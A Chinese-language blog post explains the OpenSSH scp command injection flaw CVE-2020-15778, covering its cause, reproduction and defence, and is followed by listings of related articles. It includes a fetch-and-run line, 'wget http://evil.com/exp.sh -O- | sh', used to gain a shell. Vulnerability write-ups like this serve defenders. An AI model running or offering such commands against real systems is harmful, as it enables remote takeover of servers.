[应用漏洞]OpenSSH scp命令注入漏洞(CVE-2020-15778)

最新推荐文章于 2025-03-07 11:59:47 发布
最新推荐文章于 2025-03-07 11:59:47 发布
阅读量1w 收藏 10
点赞数 4
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37865996/article/details/107755961
版权
本文详细解析了OpenSSH版本8.3p1及以下存在的scp漏洞,即便禁用ssh登录,若允许scp传输且远程服务器支持反引号(`),攻击者可通过特定payload执行scp命令获取shell。文章阐述了漏洞原理,展示了复现步骤,并提供了防御建议。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

一、漏洞简介

该漏洞发生于 OpenSSH <= 8.3p1 系统,即使在禁用ssh登录的情况下,但是允许使用scp传文件,而且远程服务器允许使用反引号(`),可利用scp复制文件到远程服务器时,执行带有payload的scp命令,从而在后续利用中getshell。

利用条件:知道目标的ssh密码

二、漏洞原理

scp是 secure copy的缩写, scp是linux系统下基于ssh登陆进行安全的远程文件拷贝命令。linux的scp命令可以在linux服务器之间复制文件和目录。

scp格式为:

scp SourceFile user@host:directory/TargetFile
scp [参数] [原路径] [目标路径]

scp命令在执行时,会使用”-t“参数来获取存储传入文件的路径,但是未对传入的文件路径进行检测防护:

使用反引号包裹payload然后加上文件名执行scp命令,这时,payload将会发送到远程服务器并执行。

三、漏洞复现

首先,我们向目标机器上传文件。如图,需要输入密码,因此我要重申,这次漏洞还是有点鸡肋。

接着,执行带有payload的scp命令,payload的作用是在目标机器上生成一个sh文件:

查看文件,可以看到创建成功:

这个漏洞可能适用于远程服务器禁用了ssh登录,但是允许使用scp传文件,而且远程服务器允许使用反引号(`)。那么攻击者可以使用下列命令获取网站的shell:

wget http://evil.com/exp.sh -O- | sh

四、漏洞防御

先确保ssh密码没有泄露,等一波openssh的新版本吧 

 

OpenSSH命令注入漏洞复现(CVE-2020-15778
千寻的博客
03-06 1万+
漏洞名称 OpenSSH命令注入漏洞 漏洞编号 CVE-2020-15778 漏洞描述 OpenSSH8.3p1及之前版本中scpscp.c文件存在操作系统命令注入漏洞。 该漏洞即使在禁用ssh登录的情况下,但是允许使用scp传文件,而且远程服务器允许使用反引号(`)。 攻击者可利用scp复制文件到远程服务器时,执行带有payload的scp命令,从而在后续利用中getshell。 OpenSSH简介 OpenSSH是 SSH(Secure SHell) 协议的免费开源实现。
OpenSSH命令注入漏洞CVE-2020-15778)修复之瞒天过海
bigwood99的博客
04-01 3821
用绿盟扫描除了OpenSSH命令注入漏洞CVE-2020-1578)。 提示OpenSSH8.4p1以及之前版本均有此漏洞。 访问OpenSSH官网,最新版本为OpenSSH8.5。其介绍并未声明解决了此漏洞。 于是采取了临时办法,将scp命令禁用。 具体执行如下: mv /usr/bin/scp /usr/bin/noscp chmod 000 /usr/bin/noscpscp命令文件名字改为noscp,并将noscp权限改为000. 这个方法虽然解决了漏洞问题,但是绿盟扫描还是.
OpenSSH 命令注入漏洞(CVE-2020-15778)
gjgj的博客
06-18 9400
OpenSSH命令注入漏洞复现 1、简介 OpenSSH 是 SSH (Secure SHell) 协议的免费开源实现,ssh主要就是用来远程控制计算机,或传输文件,OpenSSH是使用SSH透过计算机网络加密通讯的实现。 2、漏洞概述 该漏洞是存在于scp在拷贝文件时产生的一个代码注入漏洞,攻击者可以利用此漏洞执行任意命令,比如:反弹shell, 3、影响版本 openssh <= openssh-8.3p1 1 4、实验环境 首先下载openssh,版本要符合漏洞影响的版本 服务端:apt-g
发现安全漏洞CVE-2020-15778——深入OpenSSHSCP命令注入风险
gitblog_00068的博客
06-15 711
发现安全漏洞CVE-2020-15778——深入OpenSSHSCP命令注入风险 去发现同类优质开源项目:https://gitcode.com/ 项目介绍 在网络安全的广阔领域中,发现并修复漏洞是维护数据与系统安全的关键一环。今天,我们将聚焦于一个曾引起广泛关注的安全事件——CVE-2020-15778。这是一起由安全研究者Chinmay Pandya揭示的关于OpenSSH 8.3p1中S...
Openssh 最新漏洞及修复指导
最新发布
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
03-07 2683
近期安全扫描发现,OpenSSH(OpenBSD Secure Shell) 9.7p1及之前版本中存在多个漏洞,影响大部分开源版本,如下所示,更多参看版本说明和厂商安全公告受影响版本漏洞编号漏洞说明修复版本OpenSSH 9.7p1及之前版本其中,scpscp.c文件存在命令注入漏洞。该漏洞源于外部输入数据构造可执行命令过程中,网络系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞执行非法命令
OpenSSH 操作系统命令注入漏洞CVE-2020-15778
茉清语
08-09 264
OpenSSH 操作系统命令注入漏洞
[ 漏洞复现篇 ] OpenSSH 命令注入漏洞 (CVE-2020-15778)
qq_51577576的博客
08-05 3421
Linux scp 命令用于 Linux 之间复制文件和目录。scp 是 secure copy 的缩写, scp 是 linux 系统下基于 ssh 登陆进行安全的远程文件拷贝命令scp 是加密的,rcp 是不加密的,scp 是 rcp 的加强版。该漏洞虽然利用很简单,但漏洞危害很大,漏洞等级也属于严重。利用需要知道ssh密码,在测试过程中通常可以配合ssh弱口令一起使用,或者在得知ssh密码的情况下进行使用,这样就可进行反弹shell获取权限了。...
OpenSSH命令注入漏洞(CVE-2020-15778)
guoshaoliang789的专栏
03-06 735
OpenSSH命令注入漏洞(CVE-2020-15778)
OpenSSH 命令注入漏洞(CVE-2020-15778)修复
u013259937的博客
04-27 4094
OpenSSH 命令注入漏洞(CVE-2020-15778)修复 详细描述: OpenSSH(OpenBSD Secure Shell)是OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 8.4p1及之前版本中的scpscp.c文件存在命令注入漏洞。该漏洞源于外部输入数据构造可执行命令过程中,网络系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞执行非法命令。 解决办法:
修复低版本漏洞OpenSSH 操作系统命令注入漏洞CVE-2020-15778
qq_18846873的博客
12-18 1144
本次描述的修复方式只适用于应付检查,并不是真正修复,如果真正修复,需要将OpenSSH组件升级到官方最新版本。 查看当前的版本:ssh -V 把脚本中的7.4换成上面查询的结果 #!/bin/bash os=`cat /etc/os-release|grep ID|grep -v VERSION_ID` ssh_status=`systemctl status sshd` if [[ $os =~ "centos" ]];then ssh=`strings /usr/bin/ssh|gre
CVE-2020-15778 OpenSSH命令注入漏洞
yyj1781572的博客
04-05 3320
scp是secure copy的缩写。在linux系统中,scp用于linux之间复制文件和目录,基于ssh登陆进行安全的远程文件拷贝命令。该命令opensshscp.c及其他相关代码实现,通过这次实验你将了解到通过scp进行反弹shell的操作。
【Linux】OpenSSH 命令注入漏洞(CVE-2020-15778)(iptables屏蔽22端口方式)
实施工程师从入门到放弃
11-29 2784
操作过程中要边操作边验证,切记不要关闭已打开的窗口,保持开启,即使操作错误了,这个窗口也不会自动断开,还可以自行修复,否则就无法连接,直接找人吧。这就没辙了,只能限制服务器端口访问了,但是服务器不是我方管的,只能审慎执行命令,不然登不上去了还得找别人给帮忙处理。这个命令就是删除iptables -L列出的命令,后面数字为L列出来的顺序,建议从下往上删,绿盟扫出来的漏洞,但是禁用scp漏洞复扫还是有这个漏洞,查询版本SSH版本也是没问题的。验证1022端口是否可连接,可以的话回到上一步。
查看openssh版本_OpenSSH命令注入漏洞复现(CVE202015778)
weixin_39707536的博客
12-06 1695
OpenSSH命令注入漏洞复现(CVE-2020-15778)目录漏洞描述漏洞等级漏洞影响版本漏洞复现修复建议▶漏洞描述 OpenSSH是用于使用SSH协议进行远程登录的一个开源实现。通过对交互的流量进行加密防止窃听,连接劫持以及其他攻击。OpenSSH由OpenBSD项目的一些开发人员开发, 并以BSD样式的许可证提供,且已被集成到许多商业产品中。 2020年6月9日,研...
2024年Linux CentOS 环境下安装JDK的三种方法(2),2024年最新农民工看完都学会了
2401_83947434的博客
05-03 1307
为了做好运维面试路上的助攻手,特整理了上百道,让你面试不慌心不跳,高薪offer怀里抱!这次整理的面试题,本份面试集锦涵盖了1、什么是运维?2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?3、现在给你三百台服务器,你怎么对他们进行管理?4、简述raid0 raid1raid5二种工作模式的工作原理及特点5、LVS、Nginx、HAproxy有什么区别?工作中你怎么选择?6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?
OpenSSH远程eval注入漏洞CVE-2020-15778详细分析
资源摘要信息:"CVE-2020-15778是一个与OpenSSH软件有关的安全漏洞OpenSSH是一个广泛使用的开源软件,它实现了SSH(Secure Shell)协议,为用户提供了安全的网络通信和远程访问服务。在2020年7月16日,这一漏洞被...
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

东方隐侠安全团队-千里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值